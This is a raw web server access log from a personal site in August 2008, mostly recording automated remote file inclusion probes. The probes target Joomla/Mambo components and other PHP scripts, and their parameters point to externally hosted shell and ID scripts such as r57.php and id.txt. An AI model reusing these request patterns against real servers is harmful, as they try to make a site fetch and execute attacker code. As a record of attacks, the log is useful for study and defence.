61.19.158.41 - - [28/Aug/2008:11:26:57 -0700] "GET /logs/access_080805.log/modify.php?dir_module=http://primeraconchali.cl/modules/idv6.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.169.179.155 - - [28/Aug/2008:11:27:19 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
81.169.179.155 - - [28/Aug/2008:11:27:19 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
209.52.173.110 - - [28/Aug/2008:11:27:46 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.52.173.110 - - [28/Aug/2008:11:27:46 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.52.173.110 - - [28/Aug/2008:11:27:47 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.52.173.110 - - [28/Aug/2008:11:27:47 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
140.127.139.248 - - [28/Aug/2008:11:27:50 -0700] "GET /logs/access_080223.log//?mosConfig_absolute_path=%034https://www.ba-sat.com/sunshop/images/products/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.127.139.248 - - [28/Aug/2008:11:27:50 -0700] "GET /logs//?mosConfig_absolute_path=%034https://www.ba-sat.com/sunshop/images/products/id.txt??? HTTP/1.1" 200 62576 "-" "libwww-perl/5.79" "www.dmulk.com"
140.127.139.248 - - [28/Aug/2008:11:27:51 -0700] "GET //?mosConfig_absolute_path=%034https://www.ba-sat.com/sunshop/images/products/id.txt??? HTTP/1.1" 200 85251 "-" "libwww-perl/5.79" "www.dmulk.com"
140.127.139.248 - - [28/Aug/2008:11:27:52 -0700] "GET /logs/access_080518.log//?mosConfig_absolute_path=%034https://www.ba-sat.com/sunshop/images/products/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.25.36.216 - - [28/Aug/2008:11:28:47 -0700] "GET /logs/access_080720.log HTTP/1.0" 200 2502452 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
70.25.36.216 - - [28/Aug/2008:11:28:57 -0700] "GET /logs/access_080720.log HTTP/1.0" 200 2502452 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
209.52.173.110 - - [28/Aug/2008:11:29:07 -0700] "GET /logs/access_080226.log//components/com_simpleboard/image_upload.php?sbp=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
209.52.173.110 - - [28/Aug/2008:11:29:07 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
153.19.161.46 - - [28/Aug/2008:11:29:12 -0700] "GET /logs/access_080226.log//components/com_simpleboard/image_upload.php?sbp=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
153.19.161.46 - - [28/Aug/2008:11:29:12 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
153.19.161.46 - - [28/Aug/2008:11:29:13 -0700] "GET /logs/access_071222.log//components/com_simpleboard/image_upload.php?sbp=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
209.52.173.110 - - [28/Aug/2008:11:29:18 -0700] "GET /logs/access_080226.log//components/com_simpleboard/image_upload.php?sbp=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.52.173.110 - - [28/Aug/2008:11:29:18 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.52.173.110 - - [28/Aug/2008:11:29:18 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.52.173.110 - - [28/Aug/2008:11:29:18 -0700] "GET /logs/access_071222.log//components/com_simpleboard/image_upload.php?sbp=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.52.173.110 - - [28/Aug/2008:11:29:19 -0700] "GET /logs/access_080114.log//components/com_simpleboard/image_upload.php?sbp=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
153.19.161.46 - - [28/Aug/2008:11:29:20 -0700] "GET /logs/access_080226.log//components/com_simpleboard/image_upload.php?sbp=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
153.19.161.46 - - [28/Aug/2008:11:29:20 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
153.19.161.46 - - [28/Aug/2008:11:29:21 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
153.19.161.46 - - [28/Aug/2008:11:29:21 -0700] "GET /logs/access_071222.log//components/com_simpleboard/image_upload.php?sbp=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:11:29:33 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0069.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
63.243.44.3 - - [28/Aug/2008:11:29:44 -0700] "GET /logs/access_080223.log//?path%5Bdocroot%5D=http://www.h4x0rs.kit.net/r57.php????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
63.243.44.3 - - [28/Aug/2008:11:29:46 -0700] "GET //?path%5Bdocroot%5D=http://www.h4x0rs.kit.net/r57.php????? HTTP/1.1" 200 85131 "-" "libwww-perl/5.79" "www.dmulk.com"
63.243.44.3 - - [28/Aug/2008:11:29:47 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.h4x0rs.kit.net/r57.php????? HTTP/1.1" 200 62576 "-" "libwww-perl/5.79" "www.dmulk.com"
83.231.138.99 - - [28/Aug/2008:11:29:53 -0700] "GET //mainbody.php?option=com_wrapper&Itemid=1&mosConfig_absolute_path=http://socomalliance.com/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
63.243.44.3 - - [28/Aug/2008:11:29:56 -0700] "GET /logs/access_080225.log//?path%5Bdocroot%5D=http://www.h4x0rs.kit.net/r57.php????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.11.67.242 - - [28/Aug/2008:11:30:11 -0700] "GET /logs/access_080718.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.59.71.79 - - [28/Aug/2008:11:30:17 -0700] "GET /logs/access_080121.log/errors.php?error=http://http://dewa.yourfreehosting.net/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.59.71.79 - - [28/Aug/2008:11:30:17 -0700] "GET /logs/errors.php?error=http://http://dewa.yourfreehosting.net/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.59.71.79 - - [28/Aug/2008:11:30:27 -0700] "GET /logs/access_071222.log/errors.php?error=http://http://dewa.yourfreehosting.net/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.59.71.79 - - [28/Aug/2008:11:30:33 -0700] "GET /logs/access_080226.log//components/com_simpleboard/image_upload.php?sbp=http://zuppl.de/documents/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.59.71.79 - - [28/Aug/2008:11:30:33 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://zuppl.de/documents/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.59.71.79 - - [28/Aug/2008:11:30:34 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://zuppl.de/documents/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.59.71.79 - - [28/Aug/2008:11:30:34 -0700] "GET /logs/access_071222.log//components/com_simpleboard/image_upload.php?sbp=http://zuppl.de/documents/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.18.208.106 - - [28/Aug/2008:11:30:41 -0700] "GET /logs/access_080504.log/index.php?seccion=http://dj-kelly.com/guestbook////log/idscan9??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.18.208.106 - - [28/Aug/2008:11:30:42 -0700] "GET /index.php?seccion=http://dj-kelly.com/guestbook////log/idscan9??? HTTP/1.1" 200 85183 "-" "libwww-perl/5.810" "www.dmulk.com"
67.18.208.106 - - [28/Aug/2008:11:30:43 -0700] "GET /logs/index.php?seccion=http://dj-kelly.com/guestbook////log/idscan9??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.25.36.216 - - [28/Aug/2008:11:30:48 -0700] "GET /logs/access_080720.log HTTP/1.0" 200 2502452 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
62.149.232.117 - - [28/Aug/2008:11:30:55 -0700] "GET /logs/access_080329.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.15.134.248 - - [28/Aug/2008:11:31:05 -0700] "GET /logs/access_080122.log//Neos_Chronos/header.php?base_folder=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
67.195.37.158 - - [28/Aug/2008:11:31:14 -0700] "GET / HTTP/1.0" 200 84776 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.4) Gecko/20080721 BonEcho/2.0.0.4" "www.dmulk.com"
67.195.37.99 - - [28/Aug/2008:11:31:14 -0700] "GET /blog/wp-content/themes/default/style.css HTTP/1.0" 200 9232 "http://www.dmulk.com/" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.4) Gecko/20080721 BonEcho/2.0.0.4" "dmulk.com"
201.57.153.114 - - [28/Aug/2008:11:31:15 -0700] "GET /logs/access_080307.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.57.153.114 - - [28/Aug/2008:11:31:17 -0700] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://badmus.by.ru/id.txt? HTTP/1.1" 200 85255 "-" "libwww-perl/5.808" "www.dmulk.com"
67.195.37.99 - - [28/Aug/2008:11:31:18 -0700] "GET /blog/wp-content/plugins/nggallery/css/nggallery.css HTTP/1.0" 200 5241 "http://www.dmulk.com/" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.4) Gecko/20080721 BonEcho/2.0.0.4" "dmulk.com"
201.57.153.114 - - [28/Aug/2008:11:31:23 -0700] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.195.37.99 - - [28/Aug/2008:11:31:24 -0700] "GET /blog/wp-content/plugins/nggallery/thickbox/thickbox.css HTTP/1.0" 200 4019 "http://www.dmulk.com/" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.4) Gecko/20080721 BonEcho/2.0.0.4" "dmulk.com"
209.52.173.110 - - [28/Aug/2008:11:31:29 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
153.19.161.46 - - [28/Aug/2008:11:31:30 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.19.158.41 - - [28/Aug/2008:11:31:41 -0700] "GET /logs/access_080404.log//db.php?path_local=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
61.19.158.41 - - [28/Aug/2008:11:31:42 -0700] "GET //db.php?path_local=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:11:31:47 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0050.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
64.59.71.79 - - [28/Aug/2008:11:31:53 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://zuppl.de/documents/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.59.71.79 - - [28/Aug/2008:11:31:53 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://zuppl.de/documents/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.59.71.79 - - [28/Aug/2008:11:31:53 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://zuppl.de/documents/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.18.216 - - [28/Aug/2008:11:32:08 -0700] "GET /logs/access_070903.log HTTP/1.0" 200 12137 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.59.71.79 - - [28/Aug/2008:11:32:09 -0700] "GET /logs/access_080810.log/errors.php?error=http://http://dewa.yourfreehosting.net/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.59.71.79 - - [28/Aug/2008:11:32:09 -0700] "GET /logs/errors.php?error=http://http://dewa.yourfreehosting.net/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
61.19.158.41 - - [28/Aug/2008:11:32:25 -0700] "GET /logs/access_080810.log//db.php?path_local=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
200.11.67.242 - - [28/Aug/2008:11:32:33 -0700] "GET /logs/access_080329.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [28/Aug/2008:11:32:34 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [28/Aug/2008:11:32:34 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.59.71.79 - - [28/Aug/2008:11:32:36 -0700] "GET /logs/access_080703.log/errors.php?error=http://http://dewa.yourfreehosting.net/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
61.19.158.41 - - [28/Aug/2008:11:32:48 -0700] "GET /logs//db.php?path_local=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.158.41 - - [28/Aug/2008:11:32:49 -0700] "GET //db.php?path_local=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.13.224.234 - - [28/Aug/2008:11:32:56 -0700] "GET /logs/access_080307.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://preferred-hosting.com/billing/whmauto_V2_hostgator/mib_data/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
85.13.224.234 - - [28/Aug/2008:11:32:57 -0700] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://preferred-hosting.com/billing/whmauto_V2_hostgator/mib_data/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.59.71.79 - - [28/Aug/2008:11:32:59 -0700] "GET /logs/access_080220.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://zuppl.de/documents/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.195.37.99 - - [28/Aug/2008:11:33:22 -0700] "GET /blog/index.php/2008/08/18/ HTTP/1.0" 200 9931 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.4) Gecko/20080721 BonEcho/2.0.0.4" "dmulk.com"
67.195.37.99 - - [28/Aug/2008:11:33:23 -0700] "GET /blog/wp-content/themes/default/style.css HTTP/1.0" 200 9232 "http://dmulk.com/blog/2008/08/18/" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.4) Gecko/20080721 BonEcho/2.0.0.4" "dmulk.com"
67.195.37.99 - - [28/Aug/2008:11:33:23 -0700] "GET /blog/wp-content/plugins/nggallery/css/nggallery.css HTTP/1.0" 200 5241 "http://dmulk.com/blog/2008/08/18/" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.4) Gecko/20080721 BonEcho/2.0.0.4" "dmulk.com"
67.195.37.99 - - [28/Aug/2008:11:33:23 -0700] "GET /blog/wp-content/plugins/nggallery/thickbox/thickbox.css HTTP/1.0" 200 4019 "http://dmulk.com/blog/2008/08/18/" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.4) Gecko/20080721 BonEcho/2.0.0.4" "dmulk.com"
64.59.71.79 - - [28/Aug/2008:11:33:25 -0700] "GET /logs/access_080801.log//include/admin.lib.inc.php?site_path=http://http://dewa.yourfreehosting.net/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.59.71.79 - - [28/Aug/2008:11:33:25 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://http://dewa.yourfreehosting.net/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
89.111.176.96 - - [28/Aug/2008:11:33:31 -0700] "GET /logs/access_080329.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.sldating.fr/idd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.96 - - [28/Aug/2008:11:33:31 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.sldating.fr/idd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.96 - - [28/Aug/2008:11:33:32 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.sldating.fr/idd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.57.153.114 - - [28/Aug/2008:11:33:32 -0700] "GET /logs/access_080127.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.195.37.99 - - [28/Aug/2008:11:33:40 -0700] "GET /blog/index.php/2008/08/18/dan-mulkiewicz-for-president/ HTTP/1.0" 200 6978 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.4) Gecko/20080721 BonEcho/2.0.0.4" "dmulk.com"
67.195.37.99 - - [28/Aug/2008:11:33:40 -0700] "GET /blog/wp-content/themes/default/style.css HTTP/1.0" 200 9232 "http://dmulk.com/blog/2008/08/18/dan-mulkiewicz-for-president/" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.4) Gecko/20080721 BonEcho/2.0.0.4" "dmulk.com"
67.195.37.99 - - [28/Aug/2008:11:33:40 -0700] "GET /blog/wp-content/plugins/nggallery/css/nggallery.css HTTP/1.0" 200 5241 "http://dmulk.com/blog/2008/08/18/dan-mulkiewicz-for-president/" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.4) Gecko/20080721 BonEcho/2.0.0.4" "dmulk.com"
67.195.37.99 - - [28/Aug/2008:11:33:40 -0700] "GET /blog/wp-content/plugins/nggallery/thickbox/thickbox.css HTTP/1.0" 200 4019 "http://dmulk.com/blog/2008/08/18/dan-mulkiewicz-for-president/" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.4) Gecko/20080721 BonEcho/2.0.0.4" "dmulk.com"
64.59.71.79 - - [28/Aug/2008:11:33:47 -0700] "GET /logs/access_080302.log/errors.php?error=http://zuppl.de/documents/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.59.71.79 - - [28/Aug/2008:11:33:47 -0700] "GET /errors.php?error=http://zuppl.de/documents/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.59.71.79 - - [28/Aug/2008:11:33:47 -0700] "GET /logs/errors.php?error=http://zuppl.de/documents/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.13.224.234 - - [28/Aug/2008:11:33:50 -0700] "GET /logs/access_080127.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://preferred-hosting.com/billing/whmauto_V2_hostgator/mib_data/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.120.234.168 - - [28/Aug/2008:11:33:54 -0700] "GET /logs/access.log/errors.php?error=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
64.59.71.79 - - [28/Aug/2008:11:33:55 -0700] "GET /logs/access_080718.log//include/admin.lib.inc.php?site_path=http://http://dewa.yourfreehosting.net/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.195.37.99 - - [28/Aug/2008:11:34:01 -0700] "GET /blog/index.php/2008/08/16/ HTTP/1.0" 200 11038 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.4) Gecko/20080721 BonEcho/2.0.0.4" "dmulk.com"
67.195.37.158 - - [28/Aug/2008:11:34:01 -0700] "GET /?show=gallery&pageid=169 HTTP/1.0" 200 149658 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.4) Gecko/20080721 BonEcho/2.0.0.4" "www.dmulk.com"
67.195.37.99 - - [28/Aug/2008:11:34:01 -0700] "GET /blog/wp-content/themes/default/style.css HTTP/1.0" 200 9232 "http://dmulk.com/blog/2008/08/16/" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.4) Gecko/20080721 BonEcho/2.0.0.4" "dmulk.com"
67.195.37.99 - - [28/Aug/2008:11:34:01 -0700] "GET /blog/wp-content/plugins/nggallery/css/nggallery.css HTTP/1.0" 200 5241 "http://dmulk.com/blog/2008/08/16/" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.4) Gecko/20080721 BonEcho/2.0.0.4" "dmulk.com"
67.195.37.99 - - [28/Aug/2008:11:34:01 -0700] "GET /blog/wp-content/themes/default/style.css HTTP/1.0" 200 9232 "http://www.dmulk.com/?show=gallery&pageid=169" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.4) Gecko/20080721 BonEcho/2.0.0.4" "dmulk.com"
67.195.37.99 - - [28/Aug/2008:11:34:02 -0700] "GET /blog/wp-content/plugins/nggallery/thickbox/thickbox.css HTTP/1.0" 200 4019 "http://dmulk.com/blog/2008/08/16/" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.4) Gecko/20080721 BonEcho/2.0.0.4" "dmulk.com"
67.195.37.99 - - [28/Aug/2008:11:34:05 -0700] "GET /blog/index.php/2008/08/ HTTP/1.0" 200 72530 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.4) Gecko/20080721 BonEcho/2.0.0.4" "dmulk.com"
67.195.37.99 - - [28/Aug/2008:11:34:05 -0700] "GET /blog/wp-content/themes/default/style.css HTTP/1.0" 200 9232 "http://dmulk.com/blog/2008/08/" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.4) Gecko/20080721 BonEcho/2.0.0.4" "dmulk.com"
67.195.37.99 - - [28/Aug/2008:11:34:05 -0700] "GET /blog/wp-content/plugins/nggallery/css/nggallery.css HTTP/1.0" 200 5241 "http://dmulk.com/blog/2008/08/" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.4) Gecko/20080721 BonEcho/2.0.0.4" "dmulk.com"
67.195.37.99 - - [28/Aug/2008:11:34:05 -0700] "GET /blog/wp-content/plugins/nggallery/thickbox/thickbox.css HTTP/1.0" 200 4019 "http://dmulk.com/blog/2008/08/" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.4) Gecko/20080721 BonEcho/2.0.0.4" "dmulk.com"
67.195.37.99 - - [28/Aug/2008:11:34:19 -0700] "GET /blog/wp-content/plugins/nggallery/css/nggallery.css HTTP/1.0" 200 5241 "http://www.dmulk.com/?show=gallery&pageid=169" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.4) Gecko/20080721 BonEcho/2.0.0.4" "dmulk.com"
67.195.37.99 - - [28/Aug/2008:11:34:19 -0700] "GET /blog/wp-content/plugins/nggallery/thickbox/thickbox.css HTTP/1.0" 200 4019 "http://www.dmulk.com/?show=gallery&pageid=169" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.4) Gecko/20080721 BonEcho/2.0.0.4" "dmulk.com"
67.195.37.158 - - [28/Aug/2008:11:34:20 -0700] "GET /?show=gallery&pageid=159 HTTP/1.0" 200 149658 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.4) Gecko/20080721 BonEcho/2.0.0.4" "www.dmulk.com"
67.195.37.99 - - [28/Aug/2008:11:34:20 -0700] "GET /blog/wp-content/themes/default/style.css HTTP/1.0" 200 9232 "http://www.dmulk.com/?show=gallery&pageid=159" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.4) Gecko/20080721 BonEcho/2.0.0.4" "dmulk.com"
67.195.37.158 - - [28/Aug/2008:11:34:25 -0700] "GET /?show=gallery&pageid=163 HTTP/1.0" 200 149658 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.4) Gecko/20080721 BonEcho/2.0.0.4" "www.dmulk.com"
